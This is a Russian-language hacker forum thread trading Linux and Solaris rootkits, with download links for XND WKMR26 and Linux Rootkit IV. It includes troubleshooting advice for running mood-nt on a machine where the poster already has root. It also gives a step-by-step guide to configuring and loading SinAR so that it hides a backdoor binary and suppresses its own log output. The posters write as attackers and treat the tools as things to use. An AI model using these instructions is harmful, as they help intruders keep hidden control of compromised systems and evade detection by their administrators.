Вышла финальная версия руткита от WindEX'a - XND WKMR26 2.0. Добавлены некоторые удобства для конечного пользователя, несколько новых функций. По заявлению автора он выжал из VFS все. Руткит протестирован под:
- 2.6.12-std26-up-alt11 (ALT Linux kernel, no sources)
- 2.6.19.2-grsec (compiled from sources)
- 2.6.17-5mdvlegacy (Mandriva kernel, no sources)
- 2.6.17.6-0.25 or like that (SuSE kernel, no sources, x86_64 arch)
Скачать можно здесь http://xndcrew.org/index.php?module=filesdb&id=1&fid=12&get=1

Убедительная просьба всем, кто ищет информацию о руткитах для FreeBSD или ей побобных, переместиться в соответствующий раздел и топик:
Трояним FreeBSD
Заранее спасибо!

Linux Rootkit IV
Cамый популярный руткит для Linux. Последняя версия. Cодержит затрояненые версии
сhfn, chsh, crontab, du, find, ifconfig, inetd, killall, linsniffer, login, ls,
netstat, passwd, pidof, ps, rshd, syslogd, tcpd, top, sshd, su. Имеет набор своих
утилит: bindshell, fix, linsniffer, thesniff, sniffchk, wted, z2.
Вощем рулез форева!
Скачать

Абсолютно ничего рулезного тут нет. Без правильной обработки напильником подобные руткиты просто кричат в системе "МЕНЯ ВЗЛОМАЛИ!!!". И вообще-то системные утилиты надо руками протроянивать, так намного безопаснее, раз уж нет нормального ядерного руткита.

Собственно вопрос.. Получил рута на Linux 2.6.9-34.EL #1 Fri Feb 24 16:44:51 EST 2006 i686 i686 i386 GNU/Linux, скомпилил mood-nt, при запуске (по умолчанию через ./mood-nt -d) получаю эррор - D'ho! Impossibile aprire kmem.
Как запустить его чтобы работал?

Скорее всего в этом дистрибутиве (точнее на шелле), нет файла /dev/kmem, он просто не предусмотрен в нём. Не мучайся и попробуй что-нибудь из разряда модульных руткитов (adore-ng, itx-ng)

По поводу SinAR 0.3 для Solaris приведу небольшой мануал по установке и эксплуатации ;)

1) сливаем сам руткит с packetstormsecurity.org
2) распаковываем и открываем исходник в любимом редакторе для редактирования:
tar -xjf SInAR-0.3.tar.bz2 -C ./SinAR
cd ./SinAR/src
vim ./sinar.c
3) ищем строки:
#define RK_EXEC_KEY "./sinarrk"
#define RK_EXEC_KEY_LEN 9
и заменяем их на имя бинарника, который необходимо скрывать в системе во время его запуска, например так:
#define RK_EXEC_KEY "/etc/backdoor"
#define RK_EXEC_KEY_LEN 13
4) Все строки, содержащие cnm_err закомментируем, дабы не выдавать своё присутствие в системе (эта функция выводит логи в системный журнал для отладки) и сохраняем сырец
5) выполняем make all в папке с сырцом (собираем модуль)
6) загружаем модуль modload ./sinar (путь к модулю, предварительно рекомендую спрятать)
7)запускаем необходимый бинарник и НЕ наблюдаем его в списке ps ;)
8)запукаем modinfo | grep sinaк и НЕ наблюдаем такого модуля ;)
9)далее всё зависит от вашей фантазии, но учтите что SinAR не умеет скрывать ничего кроме самого себя и одного процесса + всех его потомков в системе (точнее нескольких процессов, созданных одним бинарником). Файлы придётся прятать чем-нибудь другим (или руками). По личному опяту синар является лучшим руткитом для солярки впринципе и его функциональностью вполне можно обходиться.
Надеюсь на этом тема SinAR исчерпана.

Может кто подскажет актуальные и 100% рабочие на данный момент руткиты для linux ядер 2.6.* в частности 2.6.22?

С новыми ядрами большие траблы. Пишу сейчас.

Ядро 2.6.24.1 тоже уязвимо. Уже пропатчился